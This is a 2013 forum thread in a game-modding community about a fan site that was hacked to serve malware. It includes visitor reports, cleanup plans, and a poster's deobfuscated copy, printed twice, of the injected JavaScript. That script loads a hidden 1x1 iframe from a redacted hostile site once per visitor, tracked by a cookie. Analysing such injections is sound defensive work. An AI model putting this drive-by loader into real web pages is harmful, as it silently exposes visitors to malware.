Posted: Sat Jun 15, 2013 5:58 pm Post subject:
YR Argentina infected?
I've tried to go onto YR Argentina the past couple days now, and whenever I do, AVG lights up mentioning a blackhole exploit kit-type of virus threat and doesn't let me go onto the site. After temporarily deactivating AVG (I had other AV programs, just wanted to see if they would chime in too), Google Chrome itself makes a mention about malware from some sketchy German website being injected into YRArg. (I don't remember what the sketchy site's URL was and I can't get the message to reappear)
Anyone else getting stuff similar to this when they try to go onto YR Argentina? QUICK_EDIT
Danger: Malware Ahead!
Google Chrome has blocked access to this page on yrarg.cncguild.net.
Content from www.toeppler-vertretungen.de, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.
Malware is malicious software that causes things like identity theft, financial loss, and permanent file deletion. Learn more
Go back Details about www.toeppler-vertretungen.de Proceed at your own risk
Joined: 10 Dec 2012 Location: I'm too busy conquering the world!
Posted: Sat Jun 15, 2013 8:30 pm Post subject:
Waterfox is way to go. I used to have Internet Explorer, then I moved on to google chrome, and now Waterfox. IE and Google Chrome are crap, they go super slow for me. But with Waterfox, it just load fast and everything is much smoother. _________________ Mod Leader and founder of World Domination
Waterfox is withto go. I used to have Internet Explorer, then I moved on to google chrome, and now Waterfox. IE and Google Chrome are crap, they go super slow for me. But with Waterfox, it just load fast and everything is much smoother.
Chrome checks every connections with a online known malware/spyware/virus/trojan/etc spredder sites database and if a site matches the db it displays that warning, Firefox had a similar function as well, Anyone who successfully was able to access this site after 12 of june can pretty much consider that their computer has been infested.
Unlike it sometimes happens with antiviruses these are not false positives _________________ Tiberian Dawn, Red Alert, Tiberian Sun ,Red Alert 2,Renegade, Command & Conquer 3,Tiberium and Tiberium Wars and Westwood related image & video archive
https://picasaweb.google.com/113361105083292812413?noredirect=1
Skype live:tomsons26
Don't forget to state who are you otherwise i'll ignore the invite Last edited by tomsons26lv on Sat Jun 15, 2013 10:03 pm; edited 2 times in total QUICK_EDIT
Firefox is way to go. I used to have Internet Explorer, then I moved on to google chrome, and now Firefox. IE and Google Chrome are crap, they go super slow for me. But with Firefox, it just load fast and everything is much smoother.
Firefox LLLAAAGGGSSS when I use it, and when I try to do a bandwidth test on CNet, it gets thousands of Javascript errors. I barely use Explorer other than to download Firefox or Chrome. QUICK_EDIT
Joined: 10 Dec 2012 Location: I'm too busy conquering the world!
Posted: Sat Jun 15, 2013 10:02 pm Post subject:
FYI, it is WATERFOX, not firefox... it doesnt lag for me. Internet Explorer and Chrome does lags for me and way annoying. For Waterfox, very little to none. That's why I choose waterfox over other net program. _________________ Mod Leader and founder of World Domination
I thought you were being funny or something and calling Firefox "Waterfox". I had never heard of Waterfox until, well, when I read that post and looked it up for myself. _________________ aka SavebearingBoss QUICK_EDIT
Since FF has one of the leading JS engines on the market, you can be pretty sure that the "thousands of Javascript errors" were due to bad development on the publisher's side, not due to FF.
IE also has a site security check proxy, like Chrome and FF.
As for the issue at hand, it looks like the maintainers of YR Arg have set it to a maintenance page because of the issue, but the issue remains on said maintenance page.
It looks like a very crude JavaScript injection, placing obfuscated JS code before and after the actual HTML of the site.
My guess would be an SQL injection attack dropping this into some template-related table, but it could just as well be a compromised PHP script.
And yes, as tomsons26lv pointed out, if you did end up going to the site and your AV protection didn't stop the script, you should worry. I'll try to de-obfuscate it to see what it actually does.
Update: This is the code that is actually executed on the page:
Code:
function zzzfff() {
var ultze = document.createElement('iframe');
ultze.src = '[URL REMOVED BECAUSE PEOPLE ARE MORONS]';
ultze.style.position = 'absolute';
ultze.style.border = '0';
ultze.style.height = '1px';
ultze.style.width = '1px';
ultze.style.left = '1px';
ultze.style.top = '1px';
if (!document.getElementById('ultze')) {
document.write('<div></div>');
document.getElementById('ultze').appendChild(ultze);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}
For those not firm in JavaScript, it's injecting a tiny, pretty much invisible IFrame into the page to load a hostile site.
I'm writing an e-mail to the owner of the site that's being abused for the distribution to get it taken down. _________________ #renproj:renegadeprojects.com via Matrix - direct link QUICK_EDIT
Also Known As: banshee_revora (Steam) Joined: 15 Aug 2002 Location: Brazil
Posted: Sun Jun 16, 2013 3:49 am Post subject:
YR Argentina has been fully compromised (FTP/MySQL) wise, probably due to an exploit in an old version of Joomla. Hopefully, things should be fixed in a couple of days. QUICK_EDIT
Also Known As: banshee_revora (Steam) Joined: 15 Aug 2002 Location: Brazil
Posted: Wed Jun 19, 2013 12:47 pm Post subject:
Yea... but you can't use that version of Joomla again, since it actually causes trouble for every other site in the server, including PPM itself. QUICK_EDIT
Still, we can do a fast migration of download to a still supported version of Joomla (2.5+). There is a tutorial how to do it, if it works, then I don't need to place over 800+ files manually. Most of components or plugins were free, only template was bought earlier. QUICK_EDIT
function zzzfff() {
var ultze = document.createElement('iframe');
ultze.src = '[URL REMOVED BECAUSE PEOPLE ARE MORONS]';
ultze.style.position = 'absolute';
ultze.style.border = '0';
ultze.style.height = '1px';
ultze.style.width = '1px';
ultze.style.left = '1px';
ultze.style.top = '1px';
if (!document.getElementById('ultze')) {
document.write('<div></div>');
document.getElementById('ultze').appendChild(ultze);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}
For those not firm in JavaScript, it's injecting a tiny, pretty much invisible IFrame into the page to load a hostile site.
I'm writing an e-mail to the owner of the site that's being abused for the distribution to get it taken down.
Also Known As: banshee_revora (Steam) Joined: 15 Aug 2002 Location: Brazil
Posted: Wed Jun 19, 2013 3:21 pm Post subject:
Phil is trying to figure out how the javascript infection happened. According to him, it happened on june 15th, however the site was compromised 9 days earlier. QUICK_EDIT
Ok, I've got back password to my FTP account and that's how it looks for today:
1. Migration from unsupported anymore 1.5 to 2.5 is a must.
2. Because of migration, some commercial thingies like template or some plugins won't be back. Spending 50$ on this would be a stupid move imho.
3. The best thing is that I have uninfected backup from 25th of April 2013. Thus I will have only to reupload 10 to 15 files.
4. Because I've never made a migration from older to a newer version it will take some time till website gets public. I will try to migrate all users, comments, articles and so on, but on first place is download with 750+ files. If I fail to migrate everything except download, site will be public for sure - only files are important imho
Also Known As: banshee_revora (Steam) Joined: 15 Aug 2002 Location: Brazil
Posted: Thu Jun 20, 2013 11:59 am Post subject:
The 403 problem that you are getting at YR Argentina is done in purpose. Somethings about this hacking event still needs to be fixed before the site returns. QUICK_EDIT
Would this be a good moment to point out that Joomla sucks?
Seriously, there is no clean upgrade path from 1.5 to 2.5, afaik, so you're looking at a fresh installation and a whole lot of redoing anyway.
So use the opportunity to take a look around, compare, and get rid of Joomla.
Also, unless somebody manually deleted those uploaded files, they should still be on the server. While it of course can't be ruled out, it's unlikely they've been infected with something, and there are enough Linux CLI AV scanners to check them. You can/should also compare the hashes of the uploaded files against your local copies.
If the uploaded files are clean, there's no reason to re-upload them. Just copy the clean uploads elsewhere, renew the CMS, and move the uploads back. _________________ #renproj:renegadeprojects.com via Matrix - direct link QUICK_EDIT
Would this be a good moment to point out that Joomla sucks?
I would not like to sound as smartass, really, but if you ask me, just name Joomla sucks, and I haven't heard any more idiotic name for something than it is. But really. Just it's name looks like they came from cartoon. Dumb and retarded name, although its matter of personnel opinion, and also it is matter of how is Joomla useful actually rather than how it sounds. but according to comments, it is not much useful either. QUICK_EDIT
Also Known As: banshee_revora (Steam) Joined: 15 Aug 2002 Location: Brazil
Posted: Mon Jun 24, 2013 1:11 am Post subject:
!DarkRose wrote:
:3
Good to have you back online!
He means that YR Argentina is back online.
http://yrarg.cncguild.net Last edited by Banshee on Mon Jun 24, 2013 1:40 am; edited 1 time in total QUICK_EDIT
Yup, still visit here when i can. ^_^
Been busy with job and stuffs but got back into modding again, so I've started working on some secret stuff. :3 _________________
Silly taco fumbling unicorns nocturnally launch basketballs, Hell March. QUICK_EDIT
You cannot post new topics in this forum You can reply to topics in this forum You can edit your posts in this forum You can delete your posts in this forum You can vote in polls in this forum You can attach files in this forum You can download files in this forum
YR Argentina infected?
